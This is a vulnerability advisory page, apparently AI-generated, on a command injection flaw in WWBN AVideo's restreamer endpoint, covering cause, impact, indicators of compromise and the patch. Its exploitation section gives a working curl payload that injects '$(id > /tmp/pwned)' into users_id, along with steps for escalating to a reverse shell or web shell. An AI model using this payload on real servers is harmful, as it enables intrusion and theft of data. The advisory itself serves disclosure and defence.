CVE-2026-33648: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33648 is an OS command injection vulnerability in WWBN AVideo, an open source video platform, affecting all versions up to and including 26.0. The flaw resides in the restreamer endpoint (plugin/Live/standAloneFiles/restreamer.json.php), where user-controlled users_id and liveTransmitionHistory_id values from JSON request bodies are embedded unsanitized into shell commands executed via PHP's exec(). It was published on March 22–23, 2026, with a patch committed the same day. The vulnerability carries a CVSS v3.1 base score of 8.8 (High) (Github Advisory, AVideo Advisory).

Technical details

The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command). The vulnerable file plugin/Live/standAloneFiles/restreamer.json.php reads JSON input via file_get_contents("php://input") and directly interpolates $robj->users_id and $robj->liveTransmitionHistory_id into a log file path template (e.g., ffmpeg_restreamer_{users_id}_<date>.log). This path is then concatenated into shell commands at lines 720 and 723 and passed to exec() or execFFMPEGAsyncOrRemote() without using escapeshellarg(). An attacker can inject shell metacharacters such as $() or backticks (e.g., users_id: "x$(id > /tmp/pwned)x") to achieve subshell execution. Notably, the code applies clearCommandURL() and escapeshellarg() to stream URLs and pgrep patterns elsewhere, but the log file path was overlooked (AVideo Advisory, Patch Commit).

Impact

Successful exploitation allows an authenticated attacker to execute arbitrary OS commands on the server with the privileges of the web server process. This enables full server compromise including reading sensitive files (/etc/passwd, database credentials, .env files), exfiltrating all AVideo user data, installing persistent backdoors (web shells, cron jobs), disrupting service by killing processes or deleting files, and using the compromised host as a pivot point for lateral movement. Because many AVideo deployments allow open user registration, the low-privilege authentication requirement is often a minimal barrier in practice (AVideo Advisory).

Exploitability

A proof-of-concept exploit with specific curl commands targeting the vulnerable endpoint is publicly available in the GitHub security advisory, rated high confidence (AVideo Advisory). As of the time of reporting, there is no evidence of active in-the-wild exploitation or known threat actor attribution. The EPSS score is approximately 0.091% (26th percentile), indicating a currently low but non-negligible probability of exploitation within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Github Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing WWBN AVideo instances running version 26.0 or earlier using search engines (Shodan, Censys) or by checking the AVideo version page.
  2. Obtain credentials: Register a user account (if open registration is enabled) or use existing low-privilege credentials with live streaming permissions to obtain a valid restream token via the AVideo interface or live API.
  3. Craft malicious request: Prepare a JSON POST body targeting /plugin/Live/standAloneFiles/restreamer.json.php with shell metacharacters injected into users_id:
curl -k -X POST "https://TARGET/plugin/Live/standAloneFiles/restreamer.json.php" \
  -H "Content-Type: application/json" \
  -d '{
    "token": "VALID_TOKEN",
    "m3u8": "https://example.com/stream.m3u8",
    "restreamsDestinations": ["rtmp://example.com/live/key"],
    "restreamsToken": ["VALID_TOKEN"],
    "users_id": "x$(id > /tmp/pwned)x",
    "liveTransmitionHistory_id": "1"
  }'
  1. Trigger command execution: The server constructs the log file path as ffmpeg_restreamer_x$(id > /tmp/pwned)x_<date>.log and passes it to exec(). The $() subshell executes id > /tmp/pwned before the shell processes the redirection.
  2. Verify execution: Retrieve the output file to confirm RCE: curl -k "https://TARGET/tmp/pwned" — the response should contain the web server user's identity (e.g., uid=33(www-data)).
  3. Escalate: Replace the id payload with more impactful commands (e.g., downloading a reverse shell, adding SSH keys, or installing a web shell) to establish persistent access (AVideo Advisory).

Indicators of compromise

  • Network: Unexpected POST requests to /plugin/Live/standAloneFiles/restreamer.json.php containing shell metacharacters ($(), backticks, ;, |) in the users_id or liveTransmitionHistory_id JSON fields; outbound connections from the web server process to unknown external IPs.
  • File System: Unexpected files in /tmp/ (e.g., pwned, pwned2) containing command output; new or modified web shells in the AVideo web root; new cron jobs or SSH authorized_keys entries created by the web server user.
  • Logs: Web server access logs showing POST requests to restreamer.json.php with encoded or unusual characters in the request body; PHP error logs referencing exec() failures or unexpected command strings; ffmpeg log files with anomalous names containing shell metacharacters.
  • Process: Unusual child processes spawned by the PHP/web server process (e.g., /bin/sh, curl, wget, python, nc) visible via ps aux or process monitoring tools (AVideo Advisory).

Mitigation and workarounds

Apply the patch introduced in commit 99b865413172045fef6a98b5e9bfc7b24da11678, which adds a sanitizeLogFileComponent() function that strips non-alphanumeric characters from users_id and liveTransmitionHistory_id, and wraps the log file path with escapeshellarg() before passing it to exec() (Patch Commit). As a workaround prior to patching, restrict access to the restreamer endpoint to trusted IP ranges via web server configuration, and disable open user registration to limit the attacker pool. Additionally, deploying a Web Application Firewall (WAF) rule to detect and block shell metacharacters ($(), backticks, ;, |) in JSON request bodies targeting this endpoint provides an additional layer of defense (AVideo Advisory).

Community reactions

The Hacker Wire published a write-up on the vulnerability titled "WWBN AVideo RCE via Authenticated Command Injection" shortly after disclosure (The Hacker Wire). The advisory was also shared on Mastodon by The Hacker Wire, generating community awareness. No major vendor statements beyond the original GitHub advisory from the AVideo maintainer (DanielnetoDotCom) have been identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management